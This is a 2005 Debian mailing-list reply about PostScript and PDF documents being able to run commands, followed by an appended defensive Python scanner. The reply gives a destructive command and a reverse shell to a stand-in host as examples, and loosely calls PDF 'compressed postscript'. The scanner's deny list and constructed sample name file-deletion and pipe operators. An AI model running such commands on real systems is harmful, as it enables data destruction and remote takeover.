Postscript (.ps) is a "programming language". If documents aren't handled properly, it's a security issue. This is different from the buffer overflows in xpdf and such, which are also exploitable by malicious documents. Here, no compromise of the PS software (a la stack smash) is necessary. The PS software simply lets you run a command (like rm -fr /, or sh </dev/tcp/mallory.com/1337 or whatever else).
PDF is compressed postscript, so I figure that the same applies. I wonder if it is lossy compression? Anyways, I just found http://www.kde.org/info/security/advisory-20030409-1.txt

Justin

On Thu, Feb 10, 2005 at 11:47:51PM +0100, Miriam Ruiz wrote:
> --- Justin Pryzby <[EMAIL PROTECTED]> wrote:
>
> > PDF can be trojaned, so you should at least *provide* a way to
> > generate them from their sources, even if that makefile rule is
> > not called by default, and the additional build-dependencies are
> > just a note in debian/rules.
>
> In case only PDF files were provided, or PDF provided came from .doc
> files or something like that, is it OK to include them? I didn't

Strictly speaking, no, because it's a generated file, and you didn't compile it from preferred-form source-code.
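As an added, defender-side example that is not part of this thread: a conservative Python pre-check that flags the PostScript file operators and the Ghostscript `%pipe%` device through which a document can reach the host file system or a shell, illustrating the point above that a PS document is a program. The operator list and both sample documents are constructed here for illustration.

```python
import re

# Standard PostScript operators that act on the host file system, and the
# Ghostscript device name that turns a "file" into a shell command. Any hit
# means "do not open with an unrestricted interpreter", not "proven malicious";
# the real mitigation is still a restricted interpreter (e.g. Ghostscript -dSAFER).
RISKY_OPERATORS = ("deletefile", "renamefile", "run")
RISKY_DEVICES = ("%pipe%",)

_OPERATOR_RE = re.compile(
    r"(?<![A-Za-z0-9_])(" + "|".join(RISKY_OPERATORS) + r")(?![A-Za-z0-9_])"
)
_COMMENT_RE = re.compile(r"%.*")  # '%' to end of line is a PostScript comment


def scan_postscript(text):
    """Return a sorted list of risky tokens found in a PostScript document."""
    hits = set()
    # Device names are checked on the raw text: they live inside (...) strings.
    for dev in RISKY_DEVICES:
        if dev in text:
            hits.add(dev)
    # Operators are checked with comments stripped, so DSC headers such as
    # "%%Title: run.ps" do not produce false positives.
    stripped = _COMMENT_RE.sub("", text)
    for m in _OPERATOR_RE.finditer(stripped):
        hits.add(m.group(1))
    return sorted(hits)


# Constructed sample: an ordinary "hello world" page.
BENIGN = """%!PS-Adobe-3.0
%%Title: hello.ps
/Helvetica findfont 12 scalefont setfont
72 720 moveto (Hello, world) show
showpage
"""

# Constructed sample: deletes a path and opens a pipe device (harmless command).
SUSPICIOUS = """%!PS
(/tmp/constructed-example) deletefile
(%pipe%true) (r) file closefile
showpage
"""

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, scan_postscript(doc))
```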

